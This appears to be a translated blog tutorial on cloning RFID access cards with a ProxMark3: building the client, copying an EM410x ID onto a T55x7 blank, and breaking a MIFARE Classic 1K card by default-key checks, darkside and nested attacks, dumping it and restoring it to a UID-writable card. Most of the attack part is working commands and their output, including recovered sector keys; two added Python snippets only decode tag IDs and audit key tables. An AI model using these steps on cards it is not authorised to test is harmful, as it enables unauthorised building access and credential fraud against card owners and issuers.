2018-06-19: Cloning IC cards with ProxMark3, IC cards
I. Building and upgrading the ProxMark3 client on Kali Linux
sudo apt-get install p7zip git build-essential
sudo apt-get install libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config
sudo apt-get install wget libncurses5-dev gcc-arm-none-eabi
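cd ~ ## switch to the user's home directory
git clone https://github.com/iceman1001/proxmark3.git ## clone the repository
cd proxmark3 ## enter the cloned directory
git pull ## update the repository; later upgrades can start directly from this step
make clean && make all ## build the repository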
sudo client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf
client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf
dmesg | grep -i usb
client/proxmark3 /dev/ttyACM0
hw tune
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...
[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] LF optimal: 24.50 V - 126.32 kHz
[+] LF antenna is OK
[+] HF antenna: 15.37 V - 13.56 MHz
[+] HF antenna is OK
[+] Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
pm3 -->
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...
[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] LF optimal: 24.50 V - 126.32 kHz
[+] LF antenna is OK
[+] HF antenna: 14.20 V - 13.56 MHz
[+] HF antenna is OK
[+] Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...
[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] LF optimal: 24.50 V - 126.32 kHz
[+] LF antenna is OK
[+] HF antenna: 15.74 V - 13.56 MHz
[+] HF antenna is OK
[+] Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
pm3 --> lf search
NOTE: some demods output possible binary
if it finds something that looks like a tag
False Positives ARE possible
Checking for known tags:
EM410x pattern found
EM TAG ID : 08003C9F5F
Possible de-scramble patterns
Unique TAG ID : 10003CF9FA
HoneyWell IdentKey {
DEZ 8 : 03972959
DEZ 10 : 0003972959
DEZ 5.5 : 00060.40799
DEZ 3.5A : 008.40799
DEZ 3.5B : 000.40799
DEZ 3.5C : 060.40799
DEZ 14/IK2 : 00034363711327
DEZ 15/IK3 : 000068723472890
DEZ 20/ZK : 01000000031215091510
Other : 40799_060_03972959
Pattern Paxton : 139517279 [0x850DD5F]
Pattern 1 : 5597182 [0x5567FE]
Pattern Sebury : 40799 60 3972959 [0x9F5F 0x3C 0x3C9F5F]
[+] Valid EM410x ID Found!
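From the output we can see that the card type is EM410x and the EM ID is 08003C9F5F. Next, write it straight to a new card.
Write it with the lf em 410x_write command; the trailing 1 and 64 are the size of the data block being written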
pm3 --> lf em 410x_write 08003C9F5F 1 64
Writing T55x7 tag with UID 0x08003c9f5f (clock rate: 64)
#db# Started writing T55x7 tag ...
#db# Clock rate: 64
#db# Tag T55x7 written with 0xff822001b12f2bd6
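The derived values in the lf search output above (Unique TAG ID, the DEZ formats) are all computed from the same 5-byte EM TAG ID. The following added example, which is not part of the original post and not Proxmark3 code (the function names are this example's own), recomputes them from 08003C9F5F and compares them with the values shown on this page.

```python
# Added example: recompute the derived EM410x values printed by `lf search`.
# Function and variable names are this example's own, not Proxmark3 code.

# Values copied from the `lf search` output on this page.
PAGE_VALUES = {
    "Unique TAG ID": "10003CF9FA",
    "DEZ 8": "03972959",
    "DEZ 10": "0003972959",
    "DEZ 5.5": "00060.40799",
    "DEZ 3.5A": "008.40799",
    "DEZ 3.5B": "000.40799",
    "DEZ 3.5C": "060.40799",
    "DEZ 14/IK2": "00034363711327",
    "DEZ 15/IK3": "000068723472890",
}

def reverse_bits(byte: int) -> int:
    """Mirror the 8 bits of one byte, e.g. 0x08 -> 0x10."""
    return int(f"{byte:08b}"[::-1], 2)

def em410x_formats(tag_id_hex: str) -> dict:
    raw = bytes.fromhex(tag_id_hex)
    if len(raw) != 5:
        raise ValueError("EM410x ID must be exactly 5 bytes (10 hex digits)")
    value = int.from_bytes(raw, "big")
    unique = bytes(reverse_bits(b) for b in raw)  # per-byte bit reversal
    low16 = value & 0xFFFF
    return {
        "Unique TAG ID": unique.hex().upper(),
        "DEZ 8": f"{value & 0xFFFFFF:08d}",        # low 24 bits
        "DEZ 10": f"{value & 0xFFFFFFFF:010d}",    # low 32 bits
        "DEZ 5.5": f"{(value >> 16) & 0xFFFF:05d}.{low16:05d}",
        "DEZ 3.5A": f"{raw[0]:03d}.{low16:05d}",   # byte 0 . low 16 bits
        "DEZ 3.5B": f"{raw[1]:03d}.{low16:05d}",   # byte 1 . low 16 bits
        "DEZ 3.5C": f"{raw[2]:03d}.{low16:05d}",   # byte 2 . low 16 bits
        "DEZ 14/IK2": f"{value:014d}",             # full 40-bit ID
        "DEZ 15/IK3": f"{int.from_bytes(unique, 'big'):015d}",
    }

def mismatches(tag_id_hex: str, expected: dict) -> dict:
    """Return {field: (expected, computed)} for every field that differs."""
    got = em410x_formats(tag_id_hex)
    return {k: (v, got.get(k)) for k, v in expected.items() if got.get(k) != v}

if __name__ == "__main__":
    for name, text in em410x_formats("08003C9F5F").items():
        print(f"{name:14}: {text}")
    print("mismatches vs page:", mismatches("08003C9F5F", PAGE_VALUES))
```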
1. Read the card: hf 14a info
pm3 --> hf 14a info
UID : 15 54 C6 AC
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 | 1k Ev1
[=] proprietary non iso14443-4 card found, RATS not supported
[=] Answers to magic commands: NO
[+] Prng detection: WEAK
pm3 -->
This gives the card's UID, 1554C6AC, and its type: MIFARE Classic 1K, i.e. an M1 card, with 1K of storage
hf mf chk *1 ? t
pm3 --> hf mf chk *1 ? t
No key specified, trying default keys
[ 0] ffffffffffff
[ 1] 000000000000
[ 2] a0a1a2a3a4a5
[ 3] b0b1b2b3b4b5
[ 4] c0c1c2c3c4c5
[ 5] d0d1d2d3d4d5
[ 6] aabbccddeeff
[ 7] 1a2b3c4d5e6f
[ 8] 123456789abc
[ 9] 010203040506
[10] 123456abcdef
[11] abcdef123456
[12] 4d3a99c351dd
[13] 1a982c7e459a
[14] d3f7d3f7d3f7
[15] 714c5c886e97
[16] 587ee5f9350f
[17] a0478cc39091
[18] 533cb6c723f6
[19] 8fd0a4f256e9
Time in checkkeys: 10 seconds
testing to read key B...
|sec|key A |res|key B |res|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| ffffffffffff | 1 | ffffffffffff | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ------------ | 0 | ------------ | 0 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ------------ | 0 | ffffffffffff | 1 |
|011| ------------ | 0 | ffffffffffff | 1 |
|012| ------------ | 0 | ffffffffffff | 1 |
|013| ------------ | 0 | ffffffffffff | 1 |
|014| ------------ | 0 | ffffffffffff | 1 |
|015| ------------ | 0 | ffffffffffff | 1 |
Found keys have been transferred to the emulator memory
The key A and key B columns in the output are the keys for each sector. Next, the nested attack can be used to obtain the keys of all sectors
hf mf darkside
pm3 --> hf mf darkside
executing Darkside attack. Expected execution time: 25sec on average
press pm3-button on the proxmark3 device to abort both proxmark3 and client.
[+] Parity is all zero. Most likely this card sends NACK on every authentication.
[-] no candidates found, trying again
[-] no candidates found, trying again
[+] found 12 candidate keys.
[+] found valid key: ffffffffffff
hf mf nested 1 0 A ffffffffffff d
pm3 --> hf mf nested 1 0 A ffffffffffff d
[+] Testing known keys. Sector count=16
[-] Chunk: 1.4s | found 24/32 keys (21)
[+] Time to check 20 known keys: 1 seconds
[+] enter nested attack
[+] target block: 20 key type: A
[+] target block: 20 key type: B -- found valid key [eba93a57cfe0]
[-] Chunk: 0.5s | found 1/32 keys (1)
[+] target block: 40 key type: A
[+] target block: 44 key type: A
[+] target block: 48 key type: A -- found valid key [505df95da97b]
[-] Chunk: 0.5s | found 21/32 keys (1)
[+] target block: 20 key type: A -- found valid key [1456c5a8301f]
[-] Chunk: 0.6s | found 2/32 keys (1)
[+] time in nested: 8 seconds
[+] trying to read key B...
|sec|key A |res|key B |res|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| ffffffffffff | 1 | ffffffffffff | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| 1456c5a8301f | 1 | eba93a57cfe0 | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| 505df95da97b | 1 | ffffffffffff | 1 |
|011| 505df95da97b | 1 | ffffffffffff | 1 |
|012| 505df95da97b | 1 | ffffffffffff | 1 |
|013| 505df95da97b | 1 | ffffffffffff | 1 |
|014| 505df95da97b | 1 | ffffffffffff | 1 |
|015| 505df95da97b | 1 | ffffffffffff | 1 |
[+] saving keys to binary file hf-mf-1554C6AC-key.bin...
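Read from the card issuer's side, the key tables above show which sectors still carry a key from the default list and which custom keys are shared between sectors; the nested run on this page started from the default key ffffffffffff. The following added example (not part of the original post; the function name, the regular expression and the abridged sample table are this example's own) audits such a table.

```python
import re
from collections import defaultdict

# The 20 default keys that `hf mf chk` tried in the output on this page.
DEFAULT_KEYS = set("""
ffffffffffff 000000000000 a0a1a2a3a4a5 b0b1b2b3b4b5 c0c1c2c3c4c5
d0d1d2d3d4d5 aabbccddeeff 1a2b3c4d5e6f 123456789abc 010203040506
123456abcdef abcdef123456 4d3a99c351dd 1a982c7e459a d3f7d3f7d3f7
714c5c886e97 587ee5f9350f a0478cc39091 533cb6c723f6 8fd0a4f256e9
""".split())

# Sample input constructed from rows of the two key tables on this page
# (abridged; row 012 is taken from the earlier `hf mf chk` table).
SAMPLE_TABLE = """\
|sec|key A |res|key B |res|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|005| 1456c5a8301f | 1 | eba93a57cfe0 | 1 |
|010| 505df95da97b | 1 | ffffffffffff | 1 |
|011| 505df95da97b | 1 | ffffffffffff | 1 |
|012| ------------ | 0 | ffffffffffff | 1 |
"""

ROW = re.compile(r"^\|(\d{3})\|\s*([0-9a-f-]{12})\s*\|\s*([01])\s*\|"
                 r"\s*([0-9a-f-]{12})\s*\|\s*([01])\s*\|$")

def audit_key_table(text):
    """Return (status per sector, custom keys reused across sectors)."""
    findings, users = {}, defaultdict(set)
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # header line or unrelated client output
        sector, status = int(m[1]), {}
        for slot, key, res in (("A", m[2], m[3]), ("B", m[4], m[5])):
            if res != "1":
                status[slot] = "unknown"   # key not recovered in this run
            elif key in DEFAULT_KEYS:
                status[slot] = "default"   # well-known key still in place
            else:
                status[slot] = "custom"
                users[key].add(sector)
        findings[sector] = status
    reused = {k: sorted(s) for k, s in users.items() if len(s) > 1}
    return findings, reused

if __name__ == "__main__":
    per_sector, reused = audit_key_table(SAMPLE_TABLE)
    for sec, st in sorted(per_sector.items()):
        print(f"sector {sec:02d}: key A {st['A']}, key B {st['B']}")
    print("custom keys shared by several sectors:", reused)
```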
hf mf dump
pm3 --> hf mf dump
|------ Reading sector access bits...-----|
|----- Dumping all blocks to file... -----|
[+] successfully read block 0 of sector 0.
[+] successfully read block 1 of sector 0.
[+] successfully read block 2 of sector 0.
[+] successfully read block 3 of sector 0.
[+] successfully read block 1 of sector 15.
[+] successfully read block 2 of sector 15.
[+] successfully read block 3 of sector 15.
[+] dumped 64 blocks (1024 bytes) to file hf-mf-1554C6AC-data.bin
hf mf csetuid xxxxxxxx w
hf mf restore